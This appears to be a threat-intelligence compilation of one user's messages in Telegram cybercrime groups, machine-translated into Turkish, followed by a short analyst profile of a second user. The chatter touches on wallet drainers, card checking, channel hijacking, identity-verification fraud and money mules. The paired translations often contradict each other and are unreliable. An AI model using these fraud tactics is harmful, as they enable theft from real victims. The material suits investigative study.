Ben de kefil olmadan harcamaların belirli bir yüzdesini karşılamazdım.Ben de teminat olmadan harcamaların belirli bir yüzdesi karşılığında para yatırmazdım
B
Bonya2026-02-19 16:57
ben mi?ben mi?
B
Bonya2026-02-19 16:57
Eh, o ekran görüntülerini paylaştı ama sen bana hiçbir şey vermedin.O ekran görüntülerini paylaştı ama sen hiçbir şey paylaşmadın
B
Bonya2026-02-19 16:56
onun paylaştığı ekran görüntülerine bir bakınOnun gönderdiği ekran görüntülerine bir bak
B
Bonya2026-02-19 16:55
Kefil hakkında bir şey yazmamış mıydı?Garantör hakkında bir şey yazmamış mıydı?
B
Bonya2026-02-19 16:54
Sen tam bir ucubesin😂Sen ne biçim bir ucubesin😂
B
Bonya2026-02-19 16:53
Bir kefil istemiştiniz.Garantörden rica ettin
B
Bonya2026-02-19 16:52
neredehangi yerde
B
Bonya2026-02-17 14:37
Kim bir dükkana kaliteli otomobiller temin edecek?Kim iyi arabaları olan bir dükkân açacak?
B
Bonya2026-02-17 12:10
Nereye istersen, senin için hallederler😂Nerede olursa olsun, keyifine göre sana yaparlar😂
-- EMPIRE SOHBETİ (24 mesaj) --
B
Bonya2026-03-14 13:17
Nasıl yapılacağını çoktan çözdüm, ama açıklamak için çok tembelim.Nasıl yapılacağını anladım ama açıklamaya üşeniyorum
B
Bonya2026-03-14 13:17
Ne olursa olsun seni fena halde mahvedecek.O, ne olursa olsun seni kazıklayacak
B
Bonya2026-03-12 17:16
Farklı şekillerde.Farklı şekillerde
B
Bonya2026-03-12 17:08
+ ayrıca şu anda pek çok fırtına var.+ Şu anda şiddetli fırtınalar var
B
Bonya2026-03-12 17:07
Eğer siyahsa, bahse girerim kiEğer siyah olsaydı, bahse girerdim
B
Bonya2026-03-12 17:07
Ne tür bir teklif olduğuna bağlı; eğer beyazsa, evet.Hangi teklife bağlı olarak; eğer beyazsa, evet
B
Bonya2026-03-12 17:06
İki farklı dünyaİki farklı dünya, bu
B
Bonya2026-03-12 17:06
Başka bir tane yokBaşka bir şey yok
B
Bonya2026-03-12 17:06
Yalnızca PC'lerin...Orada ayarları, yalnızca bilgisayarların görünmesini sağlayacak şekilde yapabilirsiniz
B
Bonya2026-03-12 17:05
Google, sandığım kadar etkili değil.Bana göre Google o kadar da etkili değil
B
Bonya2026-03-12 17:05
Şey, ben Google'da arama yapmıyorum, sadece Facebook'ta geziniyorum.Şey, ben Google’ı kullanmıyorum, sadece Facebook’u kullanıyorum.
B
Bonya2026-03-12 17:05
Tabii ki tüm bu süreç boyunca bir bağ bulman gerekiyorsa.Tabii ki, tüm bu saçmalıkları bir araya getirmek için hâlâ bir yol bulmamız gerekiyor
B
Bonya2026-03-12 17:04
Reddedilenler, ackey’ler fırtınalar gibi uçup gidiyor. Vesaire.Reddedilenler, hesaplar fırtınalar gibi bir anda uçup gidiyor. Vb.
B
Bonya2026-03-12 17:04
Her şey güllük gülistanlık değil, dostum.Hayır, hepsi bu kadar değil dostum, bu sadece başlangıç
B
Bonya2026-03-12 17:03
Daha fazla güven sağlayan tüm düzenli hava alımlarıEn güvenilir standart aküler
B
Bonya2026-03-12 17:03
Şu anda piyasada iyi bir ajans yok.Şu anda piyasada iyi emlak acenteleri yok
B
Bonya2026-03-12 17:02
Korkutucudan çok sinir bozucuKorkutucu olmaktan çok sinir bozucu diyebiliriz
B
Bonya2026-03-12 17:02
Kripto, kumar tutkusu ve siyahlık hepsi bir anda ortaya dökülüyorKripto, kumar ve karanlık işler hepsi akıyor
B
Bonya2026-03-12 17:01
Belediyenin yaptığı son şey, 2d’ye sızmaktı.En son 2D modda oynadığım oyun çok güzeldi
B
Bonya2026-03-12 17:01
Tırmanış konusunda, ister kendi başıma ister bütçeye göre ararsanız, 2D'de neyin işe yaradığını bulmak için testlere 1-2 bin zele harcamak gerekir ve bu da uzun sürmez.Eğer kendi kaynaklarımdan ya da bütçeden bir şeyler bulmaya çalışırsam, 2D'ye uygun bir şey bulmak için testlere 1-2 bin zela harcamak gerekir ve o da uzun süre dayanmaz.
B
Bonya2026-03-12 17:00
DöküyorumBen döküyorum
B
Bonya2026-03-12 16:59
(Çünkü beyaz teklifler için böyle bir şart bulunmamaktadır)Çünkü beyaz teklifler için böyle bir şart yok)
B
Bonya2026-02-14 14:33
AML testinde “dreiner” durumu kimlerde görülür? Yalnızca dep veya kefil olarak “ready” durumundakilerdeAML testi için drainer'ı olan var mı? Sadece depolu mu, yoksa garantili hazır olanlar mı?
B
Bonya2026-01-11 03:14
FB Beat'te biri var ve bir arkadaşım da var. FB'ye takviye lazım, fiyat pazarlığa açık.Facebook'ta mesaj atanlar var, küfür de var. Facebook hesabına para yatırmak gerekiyor, fiyatı konuşup kararlaştırırız.
-- SТYХ СНAT [ STYXMARKET.ST ] (2 mesaj) --
B
Bonya2025-12-05 12:04
Faturalar, Payzaty, Cashfree, Eportal 3DS gerekiyorFaturalar, Payzaty, Cashfree, Eportal 3DS gerekiyor
B
Bonya2025-11-22 11:14
Sohbet garantörü var mı?Burada sohbet moderatörü var mı?
-- Trafik Hakemliği Sohbeti (2 mesaj) --
B
Bonya2025-11-24 14:50
100%100%
B
Bonya2025-11-24 14:49
Tg kanalı ele geçirilecekTg kanalı çalınacak
-- Raven CC denetleyicisi (2 mesaj) --
B
Bonya2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Bonya2025-11-21 21:18
/check/check
-- Vision Browser Sohbeti (2 mesaj) --
B
Bonya2025-11-14 16:47
Teşekkür ederim.Teşekkürler
B
Bonya2025-11-14 16:47
vicen'in eseri ru'da mı?Rusça'da "вижен ворк" ne anlama geliyor?
-- 💬ONE|Sohbet (86 mesaj) --
B
Bonya2025-03-05 17:06
Arkadaşlar, ped alabileceğim bir dükkân önerin bana.Çocuklar, oyun alanlarını nereden bulabileceğimizi söyleyin
B
Bonya2025-03-05 16:22
delice bir şey bile yapamıyorumHatta manikür bile yapamıyor
B
Bonya2025-03-05 16:22
aynı şekildeaynı şekilde
B
Bonya2025-03-05 16:21
Lanet olsun, mentorun öğrencilerle bir sohbet odası var mı yok mu, cevap ver şunu artık.Lanet olsun, biri bana cevap versin de, danışmanın öğrencilerle bir sohbet grubu var mı yok mu?
B
Bonya2025-03-05 16:10
ve bu kimin ki?peki ya ts kim?
B
Bonya2025-03-05 15:44
Zor değil, ama burada kapsamlı kılavuzlar yok, sadece öğreticiler var.Orada zor değil ama burada kapsamlı kılavuzlar yok; sadece eğitmenlerde var
B
Bonya2025-03-05 15:42
Aslında, evet, nasıl yapılacağını biliyorsanız.Aslında evet, eğer yapabiliyorsan
B
Bonya2025-03-05 15:42
yarım günyarım gün boyunca
B
Bonya2025-03-05 15:42
İlki 600 kişiden oluşuyor, o ise cevap vermiyor.İlk 600 kişiye cevap vermiyor
B
Bonya2025-03-05 15:41
Eğer paranız varsa, fiyatı 200 dolar olanı alın.Eğer paran varsa, 200 dolar isteyeni al
B
Bonya2025-03-05 13:55
Öğretim konusunda gerçekten harika olan biri, öğrenci sohbet odası var mı?Orada eğitim veren bilimkurgu yazarı var mı? Öğrencilerin sohbet grubu var mı?
B
Bonya2025-03-03 15:10
ÇeklerFaturalar
B
Bonya2025-03-03 15:10
Elektrikli süpürge olanTozunu alan
B
Bonya2025-03-03 15:10
AnladımVar
B
Bonya2025-03-03 15:10
Muhtemelen yazılımla uğraşan fahişeler de vardır.Burada kesinlikle yazılım hileçileri var
B
Bonya2025-03-03 15:09
Şöyleydi kiÖyleydi
B
Bonya2025-03-03 15:09
Ah, bu güzel.Vay canına, bu harika!
B
Bonya2025-03-03 15:09
Trinuriuet ruruRuru’yu üçlü bir şekilde çalar
B
Bonya2025-03-03 15:09
Ve bunlar toplanıyorVe bunları topluyorlar
B
Bonya2025-03-03 15:09
Tip orada oturmuş, ambalajları yırtıp duruyorTip oturmuş, cipsleri yiyor
B
Bonya2025-03-03 15:04
Neden Ukrayna plakaları var?P, Ukrayna plakaları ne işe yarar?
B
Bonya2025-03-03 15:03
"kc" dedim.“Kts” dedim
B
Bonya2025-03-03 15:03
Anladım.Anladım
B
Bonya2025-03-03 15:03
Eğer işler karmaşıklaşırsa, melon şapkanı kaybedeceksin.Eğer burada işler senin için zorlaşırsa, kafan karışabilir
B
Bonya2025-03-03 15:03
Kahretsin, ben roux’yu ocaktan alırken sen Facebook’taki rekul’u kaç kez çalıştıracağını bir karşılaştıralım.Hadi bakalım, karşılaştırma yapalım: Ben kamerayı indirene kadar Facebook’ta kaç kez yeniden yükleme yapacaksın?
B
Bonya2025-03-03 15:02
Bir eskort içinEskort hizmeti
B
Bonya2025-03-03 15:02
Bu tiplerin, lanet olası bir mastürbatörü harekete geçirecek kadar saçma sapan bir gelişimi var.Bu tipler, o sikik mastürbasyon makinesini çalıştırmak için bir yol bulmuşlar
B
Bonya2025-03-03 15:02
Kahretsin, burada herkes “woker”.Kahretsin, burada hep el işçileri var
B
Bonya2025-03-03 15:02
Ne tür masalarHangi masalar
B
Bonya2025-03-03 15:01
Sesin güzelse 30 senin olacak.Sesin güzelse 30'u senin olacak
B
Bonya2025-03-03 15:01
Daha fazla para varOrada daha fazla para var
B
Bonya2025-03-03 15:01
Gel de benim işyerimde çalış.Kültür Merkezi’ne gelip benimle çalışmaya başladılar
B
Bonya2025-03-03 15:00
HayırHayır
B
Bonya2025-03-03 14:59
PlategamPlategam
B
Bonya2025-03-03 14:59
+ Tekrar izleme konusunda pek bilgim yok+ Ben bu konulardan pek anlamam
B
Bonya2025-03-03 14:59
İyi damlalar bulmak zor.İyi drop'lar bulmak da zor
B
Bonya2025-03-03 14:58
Yoksa 1.0 sürümü var mı?Ya da 1.0 var mı?
B
Bonya2025-03-03 14:58
Burada sadece 2,0 phish var.Ve burada 2,0 akım değerine sahip dirençler var
B
Bonya2025-03-03 14:58
Ya da 2.0 yerine 1.0 daha iyidir.Eh, 2.0'dan ziyade 1.0 daha iyidir
B
Bonya2025-03-03 14:57
Mamutlarla birlikteMamutlarla
B
Bonya2025-03-03 14:57
2.0, boş boş oturup vakit öldürerek işe yaramaz.2.0'da oturup boş boş konuşmak işe yaramaz
B
Bonya2025-03-03 14:57
Ben daha çok trafik işleriyle ilgilenen biriyim.Trafik açısından artık ben değilim
B
Bonya2025-03-03 14:57
İşte Roo'nun X'leriİşte eldeki X’ler
B
Bonya2025-03-03 14:56
Ancak bunlar reklam ekiplerinden değilAma bunlar reklam ekipleri değil
B
Bonya2025-03-03 14:56
Öyle. Böyle birini tanıyorum.(Yapanlar) tanıdıklarım var
B
Bonya2025-03-03 14:56
Tabii, günde 400-500 kazanmayı biliyorsan durum farklı.Eğer becerisi varsa, günde 400-500 gibi rakamlar da yapılabilir
B
Bonya2025-03-03 14:55
Peki, bunda ne var ki?)Ee, peki, burada neyi unuttum ki? )
B
Bonya2025-03-03 14:55
Kılavuza bir bağlantı varOrada kılavuza bir bağlantı var
B
Bonya2025-03-03 14:54
İşte bu tür ellerİşte böyle eller işleri yoluna koyar
B
Bonya2025-03-03 14:54
Lanet olası bir el sallamak için ağzı sulanıp gözlerini dikmiş.Sikişmek için, ağzından salya akıtıp gözlerini iki yana açabilirsin
B
Bonya2025-03-03 14:54
Peki, sorun ne? Aynı iş.Peki, sorun ne ki? Bu da aynı iş.
B
Bonya2025-03-03 14:53
O bölgeye varmak bir ay sürecekBir ay içinde bölgeye ulaştırılacaklar
B
Bonya2025-03-03 14:53
Ve gidecek hiçbir yer yok. Aklın varsa, bunu anlarsın. Yoksa, buradan defolup gidersin.Evet, burada yapacak bir şey yok; ağın varsa anlarsın, yoksa ne yapacaksın ki?
B
Bonya2025-03-03 14:53
Ne istiyorsun?Ne istiyordun ki?
B
Bonya2025-03-03 14:53
ReklamReklam
B
Bonya2025-03-03 14:52
Buraya geleli 2 gün oldu ve 2.0 hiç ilgi çekici gelmiyor. Ben onu havalı bulmuştum.Burada 2 gündür bulunuyorum ve 2.0 ilginç gelmiyor; ben bunun eğlenceli bir şey olduğunu sanmıştım
B
Bonya2025-03-03 14:52
Ve bir mamut yiyinVe bir mamut beslemek
B
Bonya2025-03-03 14:52
Ne söyleyeceğine karar verirken aklını kullan.Ne cevap vereceğimi bir düşünmeliyim
B
Bonya2025-03-03 14:52
Hiçbir sır yokturBurada sır falan yok
B
Bonya2025-03-03 14:52
Sana ne verecek?Size ne kazandıracak?
B
Bonya2025-03-03 14:52
Peki, kullanım kılavuzunda da aynı bilgiler varsa bunun ne anlamı var ki?Peki, kullanım kılavuzunda tüm o bilgiler varsa ne anlamı var ki?
B
Bonya2025-03-03 14:51
Tüm sorularınıza cevap verecek zamanı olacakHepinize tek tek cevap verebilecek miyiz acaba?
B
Bonya2025-03-03 14:51
Ne antrenman ama!Hangi uygulama?
B
Bonya2025-03-03 14:51
Orada 100 kişi var.Vay be, orada her birinde 100 kişi var
B
Bonya2025-03-03 14:51
Neden bana biraz para vermiyorsun? Ben de sana kelepçenin kullanım kılavuzunu vereyim.Belki bana biraz para gönderirseniz, size sabitlenmiş bir kullanım kılavuzu veririm
B
Bonya2025-03-03 14:50
SabitlerkenSabitlemede
B
Bonya2025-03-03 14:50
Her şeyi öğrenmek için bir kılavuza ihtiyacınız yok.Hadi bakalım, hepinizin el kitabı var zaten
B
Bonya2025-03-03 14:50
2.0, neyse odur.2.0 Neyse o, şimdi de öyle
B
Bonya2025-03-03 14:50
Sorun ne lan?Ne halt bir soruymuş bu
B
Bonya2025-03-03 14:48
Bunu kendin mi başlattın?Sen kendin başlattın mı?
B
Bonya2025-03-03 14:48
"Coo-coo" yokHiç de işe yaramıyor
B
Bonya2025-03-03 14:48
lk'ye bir saldırı varLK'de cinayet var
B
Bonya2025-03-03 14:48
LK'da neler oluyor?LK için ne tür bir çalışma?
B
Bonya2025-03-03 14:48
Sizin deyiminizle, “pislikler”, siz bunlardan hangisisiniz?Bu "hüi"leri kimden aldın, nasıl ifade ettiysen
B
Bonya2025-03-03 14:47
Burada ne demek istediğini anlamıyorum.İşte burada ne dediğini tam olarak anlamadım
B
Bonya2025-03-03 14:46
Eğer oturum açmışlarsa, harika.Eğer lk’ye girerlerse o zaman zbs
B
Bonya2025-03-03 14:46
Peki, giriş yapıyorlar mı?Peki, lk’ye giriyor musunuz?
B
Bonya2025-03-03 14:45
Onları nasıl çektiğini bilmiyorum.Bilmem, nasıl çekildiklerini anlamıyorum
B
Bonya2025-03-03 14:45
Yazmayı bırakılacak köpekler mi?Abonelik için Puşi mi?
B
Bonya2025-03-03 14:45
Siktir, burada lanet olası bir düğme varOrada ne var ki, bir de o saçmalıkları dinlemek zorunda kalmak
B
Bonya2025-03-03 14:42
Kendim döküyorumBen kendim döküyorum
B
Bonya2025-03-03 14:42
Lanet olsun, bunun siktir etmek için olmadığını anladım.Lanet olsun, anladım ki bu hiç de saçma değil
B
Bonya2025-03-03 14:41
Dostum, burada fişle hiçbir şey satmıyorlar, bu maaş günü fişi.Dostum, burada fişle hiçbir şey satmıyorlar; ödeme için fiş kullanılıyor.
B
Bonya2025-03-03 14:41
Anlıyorum, dökecek bir yer yokAnladım, buraya dökmenin bir anlamı yok
B
Bonya2025-03-03 14:40
Sanırım Standart 2.0.Sıradan 2.0 gibi
B
Bonya2025-03-03 14:40
Sanki trafiği tıkıyorlarmış gibi bir durum yokDemek ki buraya trafik akışı yok
-- FbStor - Başarılı Webmasterların Sohbeti! (23 mesaj) --
B
Bonya2025-02-26 07:51
Eh, ne halt ediyorsan et işte.Eh, neyse, orada kimin yüzü olursa olsun
B
Bonya2025-02-26 07:50
Bir okul çocuğu 200₽ verdi.Hadi, okul karnesine 200₽ ver
B
Bonya2025-02-26 07:50
İşe yarayacakİşe yarar
B
Bonya2025-02-26 07:50
Sokakta evsiz bir adam göreceksin.Sokakta bir evsizi yakalayıp geç git
B
Bonya2025-02-26 07:50
Yani herkes kendi yüzüne inanır, kimin yüzü olursa olsun.Herkes kendi adına doğrulama yapıyor, kimin umurunda ki
B
Bonya2025-02-26 07:50
Yüzüne.Kendi yüzüne
B
Bonya2025-02-26 07:49
Ama gerçek şu ki, ne olursa olsun, bunu 10 kez yaptım.Ama aslında neyse, ben 10 hesap doğruladım
B
Bonya2025-02-26 07:49
Söylesene, sen sadece saçmalıyorsun.Öyleyse söyle bakalım, karabekara mı döküyorsun?
B
Bonya2025-02-26 07:49
Şunları yapabilirsiniz:Mümkün mü?
B
Bonya2025-02-26 07:49
Yüzüne.Kendi yüzüne
B
Bonya2025-02-16 20:26
onları bir tür eğitimle mahvetmek ve üzerlerine trafik akışını yönlendirmek yerine.yani, bir tür eğitim bahanesiyle insanları kandırıp, onların üzerinden trafik çekmek gibi bir şey değil mi?
B
Bonya2025-02-16 20:25
lei normal ubt tt tt youtube vb.Lei, normal UBT, TT, YouTube vb.
B
Bonya2025-02-15 17:31
XzХз
B
Bonya2025-02-15 17:31
Eğitim bahanesiyleEğitim bahanesiyle
B
Bonya2025-02-15 17:31
KanallaraKanallara
B
Bonya2025-02-15 17:31
Sadece insanların yarattığı trafik.Sadece insanlardan gelen trafik artıyor
B
Bonya2025-02-15 17:31
Adam, tüm kanallarına abone olun diyorAdam şöyle diyor: “Tüm kanallarına abone olun”
B
Bonya2025-02-15 16:36
Yazmanıza gerek yokHuinyu’nun önerisi: yazmasanız da olur
B
Bonya2025-02-06 15:11
Eğer içki servisinin temel kurallarını bilmiyorsanız, başınız belaya girecekEğer döküm yapmanın temellerini bilmiyorsan, nasıl yapacaksın?
B
Bonya2025-02-06 15:11
Aipi'yi değiştirmek için bir düğme var, en azından Google'da bir arama yapmalısın.Oradaki düğmeye basınca IP adresi değişiyor, istersen Google’da ara
B
Bonya2025-02-06 15:10
🤨🤨
B
Bonya2025-02-06 15:09
Oradaki aipi’yi döndürerek değiştirebilirsiniz.Orada API ile rotasyonu değiştirebilirsiniz
B
Bonya2025-02-06 15:09
Neden 1? Çünkü aynı mobil cihaz.Neden 1? Bunlar Mobil cihazlar ya
-- CryptoGrab - Karşılıklı Yardım Sohbeti (10 mesaj) --
B
Bonya2025-02-06 15:31
O kadar basit değilO kadar da basit değil
B
Bonya2025-02-06 15:31
Çok kolay.İzi
B
Bonya2025-01-23 20:30
Tek bir örnek bile yokTek bir örnek bile yok
B
Bonya2025-01-23 20:30
İnternette AML testleriyle ilgili hiçbir reklam bulamamış olmam hiç de komik değil.Aslında internette AML testlerinin reklamını hiç bulamamış olmam ne komik
B
Bonya2025-01-23 17:20
AML'de hiçbir şey yok.AML'de genel olarak hiçbir şey yok
B
Bonya2025-01-23 17:20
Facebook'ta AML'yi denedim; Amerika'yı da kapsaması mantıklı, hatta internette bulunmayan eski paketler bileFacebook’ta AML’yi denedim, Amerika’yı da araştırdım ama internette bu konuda bilgili, hatta eski bağlantılar bile bulamadım.
B
Bonya2025-01-23 17:19
Peki, ne tür bir teklif planlıyorsun?Peki, genel olarak ne tür bir teklif planlıyorsun?
B
Bonya2025-01-23 17:16
AML kullanıyor musunuz?Peki sen AML mi döküyorsun?
B
Bonya2025-01-21 20:38
Facebook paylaşımı yapan herkes birkaç soruyu açıklığa kavuşturmak isterFacebook'ta paylaşım yapan var mı? Birkaç soruyu netleştirmek istiyorum.
B
Bonya2025-01-20 11:08
AML için CREOS örnekleri olan var mı?AML için kreatif örnekleri olan var mı?
-- Rolex | genel sohbet (28 mesaj) --
B
Bonya2024-09-11 15:29
Litvanyalılar hangi sahada ne yapıyorlar?Litvanya hangi platformda hırpalanıyor?
B
Bonya2024-09-11 15:21
Vidayla uğraşıyor musun?Ne, kafayı mı yedin?
B
Bonya2024-09-11 15:20
Sadece bu siteler çok kısıtlayıcı ve onlarla uğraşmak çok zahmetliSadece platformlar çalışmayı çok kısıtlıyor ve onlarla başa çıkmak tam bir baş belası
B
Bonya2024-09-11 15:19
Aklımda bir tema var. Eğer bunu yaparlarsa, gerçekten harika olur.Orada bir konu buldum ve yazdım; eğer bunu yaparlarsa harika olur
B
Bonya2024-09-11 15:19
Fincada pek fazla kütük görmüyorum.Finans konusunda pek bir logo göremiyorum
B
Bonya2024-09-11 15:19
Tüm mekanlarda ortalık tam bir karmaşa içinde.Hadi ama, o herifler orada oturmuş, tüm sahalarla ilgili bir sürü saçmalık çeviriyorlar
B
Bonya2024-09-11 15:16
Ben de bunu diyorum işte, sanki bir ford üzerine bir ford gibi.Eh, ben de diyorum ki, dolandırıcılık üstüne dolandırıcılık
B
Bonya2024-09-11 15:15
Şu anda neyin daha iyi gittiğini anlayamıyorum; Finlandiya’daki herkesin çalışmadığını görüyorum.Şu anda hangisinin daha iyi çalıştığını hiç anlayamıyorum, herkesin Finke’sinde bir şeyler düzgün çalışmıyor gibi görünüyor
B
Bonya2024-09-11 15:08
Şey, proxy'lerde şansın yaver giderse, bu işin şansı yüzde 50'ye 50'dir.Şey, şansımız yaver giderse %50-50, proxy konusunda
B
Bonya2024-09-11 15:07
Ama şunu bilmenizi isterim ki, günümüzde lüks proxy’ler yüzünden, Viber’da bile oturum açtığınızda sistem çıldırıyor.Ama şunu bir anla: Şu anda lüks proxy'lerle, Viber'a girdiğinde bile sahte gösteriliyor.
B
Bonya2024-09-11 15:07
Şey, AB tenekeleri konusunda pek bilgim yok.Şey, AB bankaları konusunda pek bir şey bilmiyorum
B
Bonya2024-09-11 15:07
lk'dalk'da
B
Bonya2024-09-11 15:06
Eskiden şarküteri dükkanlarında 10 adet soğuk hava odası olurduEskiden 10 kat uygulandığında daha iyi dayanırdı
B
Bonya2024-09-11 15:06
Eh, 922 de 1'de ve pozisyonunu koruyor.Eh, 922’de de 1 kişi girip kalıyor
B
Bonya2024-09-11 15:05
3 ziyaretten sonra bile özel bir ortam bile onları çok korkutuyor.3 denemeden sonra bile özel mesajla onları dolandırıyor
B
Bonya2024-09-11 15:05
1 vekil varsa, 1-2 bankaEğer 1 proxy 1-2 akım bankası ise
B
Bonya2024-09-11 15:05
Şey, hangi bankaya bağlıTabii, hangi bankaya bağlı olarak
B
Bonya2024-09-11 15:04
Laksheri zırvalıklarında vekiller genellikle pisliktirLaksheri'deki proxy'ler genellikle kirli
B
Bonya2024-09-11 08:44
Uyuyor mu?O uyuyor mu?
B
Bonya2024-09-11 08:40
Ah, bu harika bir fikir.ZBS'yi kim icat etti?
B
Bonya2024-09-11 08:40
Orada bir bit pazarı falan yok mu?Peki ya onların orada burada o tür bit pazarları falan yok mu?
B
Bonya2024-09-11 08:40
BerbatHuevo
B
Bonya2024-09-11 08:39
BilyaBilyâ
B
Bonya2024-09-11 08:39
Sohbet odaları var mı?Orada sohbet odaları var mı?
B
Bonya2024-09-11 08:38
Bilen var mı?Bilen var mı?
B
Bonya2024-09-11 08:38
Finca’daki insanlar TG kullanıyor mu?Finlandiya’da insanlar Telegram’ı kullanıyor mu?
B
Bonya2024-09-10 12:14
Teşekkür ederim.Teşekkürler
B
Bonya2024-09-10 12:13
Finlandiya'da saat kaç?Şu anda Fink’te saat kaç?
-- Güncel/Doğrulamalar/Kazançlar💃🛍 (37 mesaj) --
B
Bonya2024-06-16 17:17
Onu şiddetle savunan kimseyi göremiyorumBurada onu hararetle savunan kimseyi görmüyorum
B
Bonya2024-06-16 17:17
Sonuçta durum böyle anlatıldı ve artık herkes kendi kararını veriyor; sadece admin pasha’nın onu savunuyor olması da çok şey ifade ediyor.Neyse, durumu anlattım; gerisi herkese kalmış, kendi kararını kendisi verir. Onu sadece yönetici Paşa’nın savunuyor olması ise pek çok şeyi anlatıyor.
B
Bonya2024-06-16 17:15
Ve yine ödeme yapmadıVe yine ödeme yapmadı
B
Bonya2024-06-16 17:15
Hayır, o parayı bize havale etti, ama sonra parayı aktarabileceğimiz ana hesap elimizde yoktu, bu yüzden son çare olarak Vika’ya mektup yazdık.Hayır, o parayı bize aktardı ama o sırada para transferi için kullanabileceğimiz ana hesap yoktu ve son çare olarak Vike’ye mesaj attık.
B
Bonya2024-06-16 17:14
Başlangıçta biz de bir sorun yaşamıyorduk, ama son zamanlarda paranız sürekli kayboluyor.Başlangıçta bizim durumumuz da normaldi ama son zamanlarda paranız sürekli kayboluyor.
B
Bonya2024-06-16 17:14
Spam mı yapıyorum? Burada oturmuş insanlara gerçeği anlatıyorum. İsterseniz silebilirsiniz. İnsanlara nasıl çalıştığınızı anlatın.Peki ya bende spam var mı? Ben burada insanlara gerçeği anlatıyorum; istersen silebilirsin, ne fark eder ki? Bırak da insanlar sizin nasıl çalıştığınızı bilsinler.
B
Bonya2024-06-16 17:13
Bunlardan birine sahip olduğunuzdaBöyle bir durumla karşılaştığınızda
B
Bonya2024-06-16 17:13
Öyleyse artık biraz düşünmenin zamanı geldiÖyleyse artık biraz düşünmenin zamanı geldi
B
Bonya2024-06-16 17:13
Biz de nei ile uzun süredir çalışıyoruz ve bu ikinci kez yaşanan bir durumOnunla da uzun süredir çalışıyoruz ve bu zaten ikinci durum
B
Bonya2024-06-16 17:13
Sonra g değerlerini kaydetti ve “Nasıl işlediğini biliyorsun” dedi.O da GS’yi kaydetti ve onun nasıl çalıştığını bildiğinizi söyledi
B
Bonya2024-06-16 17:13
İşte olay tam olarak bu, baştan başlayalım: Parayı çekmek için kartını aldık, 60 bin yükledik; o da parayı çekmeye gittiğinde, ATM’nin kartı yuttuğu için paranın orada olmayacağını yazmış ve hepsi bu kadar; 60 bin çöpe gitti.İşte tam da bu, hadi baştan başlayalım: Önce ondan para çekmek için kartını aldık, 60 bin yükledik; o da parayı çekmeye gitti ve para çıkmayacağını söyledi; sözde ATM kartını yutmuş ve her şey mahvolmuş; biz de 60 bin'i çöpe attık.
B
Bonya2024-06-16 17:11
Bizi elinde tutan o değilYoksa biz onun yanında değil miyiz?
B
Bonya2024-06-16 17:11
Her ne kadar 60 bin çalınmış olsa daHer ne kadar bizden 60 bin çalınmış olsa da
B
Bonya2024-06-16 17:11
Normal mi? Her şeyi burada açıkladık. Bize aptal olduğumuzu söylüyorsun.Normal mi? Biz burada her şeyi açıkladık, siz ise bizim aptal olduğumuzu söylüyorsunuz
B
Bonya2024-06-16 17:10
Onu savunuyorsunOnu savunuyorsunuz
B
Bonya2024-06-16 17:10
Hâlâ paramız ondaParamız onda kaldı
B
Bonya2024-06-16 17:10
HepsiHepsi
B
Bonya2024-06-16 17:10
Bir adama 60 bin dolar ödendiği halde, o “para yok” dedi.Birine 60 bin yatırdılar, o da “para olmayacak” dedi
B
Bonya2024-06-16 17:10
Açıklama*Açıklanmıştır*
B
Bonya2024-06-16 17:10
Durumun tamamı size anlatıldıSana tüm durumu anlattılar
B
Bonya2024-06-16 17:09
Kim pes edecek? O mu, yoksa biz mi?Dropo'yu kim yapıyor, o mu yoksa biz mi?
B
Bonya2024-06-16 17:09
Bankada 60 binimiz var. Para nerede?60 bin yatırdık, para nerede?
B
Bonya2024-06-16 17:09
Durum sana tam olarak açıklandı; cinsiyetin ne olduğu önemli değil.Durumu sana hangi kadınlar açıkladıysa, cinsiyet hiç önemli değil
B
Bonya2024-06-16 17:08
60 bin çek ve bugünlük bu kadar.60 bin kazanıp işin içinden çıkmak
B
Bonya2024-06-16 17:08
Ya da makul sınırlar içinde siktir git.Ya da makul sınırlar içinde ne halt ediyorsunuz ki?
B
Bonya2024-06-16 17:08
İnsanların ödeyecek hiçbir şeyi yokİnsanlar neyle ödeme yapacak?
B
Bonya2024-06-16 17:08
Ve kartın bozulduğunu ve parasının bittiğini söylüyor.Ve diyor ki: “Kart takıldı, para yok.”
B
Bonya2024-06-16 17:08
Bir adama 60 bin ödendi, kadın da çekime gitti.Bir adama 60 bin verdiler, o da çekim yapmaya gitti
B
Bonya2024-06-16 17:07
Demek bana gerçekleri anlatacaksın.Öyleyse bunu fakülte açısından gerekçelendir
B
Bonya2024-06-16 17:07
Peki, lanet olsun, suçlu kim, kim beni bu duruma düşürdü?Peki, kim lanet olsun ki suçlu, kim salak ben miyim?
B
Bonya2024-06-16 17:07
Söyleyecek bir şey yok mu?Söyleyecek bir şey yok mu?
B
Bonya2024-06-16 17:07
Ya da o lanet şifreyi giremedim.Yoksa ne bilsin, o çarpık ellerle pin kodunu giremedi mi?
B
Bonya2024-06-16 17:06
Bir ATM, kartı nasıl sıkıştırabilir ki lan?Bir ATM nasıl olur da kartı yutabilir ki lan?
B
Bonya2024-06-16 17:06
EmekçilerEmme noktaları
B
Bonya2024-06-16 17:06
Ve sen de onun için deli gibi pompalıyorsun.Siz de ne halt yiyorsunuz burada onun için indirme yapıyorsunuz?
B
Bonya2024-06-16 17:06
Siz lanet olası doğuştan yetenekliler, tam birer salaksınız. Burada bir kadın oturmuş parasıyla uğraşıyor ve kartı ATM tarafından yutuldu.Siktir, siz gerçekten kafayı yemişsiniz; büyükannenizin üzerinde bir bok parçası oturuyor, ATM kartını yutmuş.
B
Bonya2024-06-16 16:40
@kysia1987 dolandırıcılık yapma, dropkick attım ve 60k ile birleştim@kysia1987 Bu dolandırıcılık, çalışmıyor; bir miktar para yatırdıktan sonra 60k ile ortadan kayboldu

MONETTI ESCOBAR: Sessiz Patron

Bonya'nın 261 mesajıyla tam bir tezat oluşturan MONETTI'nin ise sadece 10 genel mesaj — hepsi tek bir başlık altında TraFFeeQ Sohbeti (Siyah ADS/SEO trafik arbitrajı), bir meslektaşımı savunurken:

TraFFeeQ SohbetiAralık 2025
"Bir adam işini yapar, bunun karşılığında maaş alır — bu konuyu tartışmak ister misin?"
İnsan işini yapıyor, bunun karşılığında maaş alıyor, tartışacak ne var ki?)
Suç faaliyetlerini "sadece bir iş" olarak normalleştirmek
TraFFeeQ SohbetiAralık 2025
"Seninle konuşacak hiçbir şey yok"
Seninle tartışacak bir şey yok
Küçümseyici otorite — patron zihniyeti, tartışmanın ötesinde
TraFFeeQ SohbetiAralık 2025
"Senin dışında yapacak bir sürü şey var!"
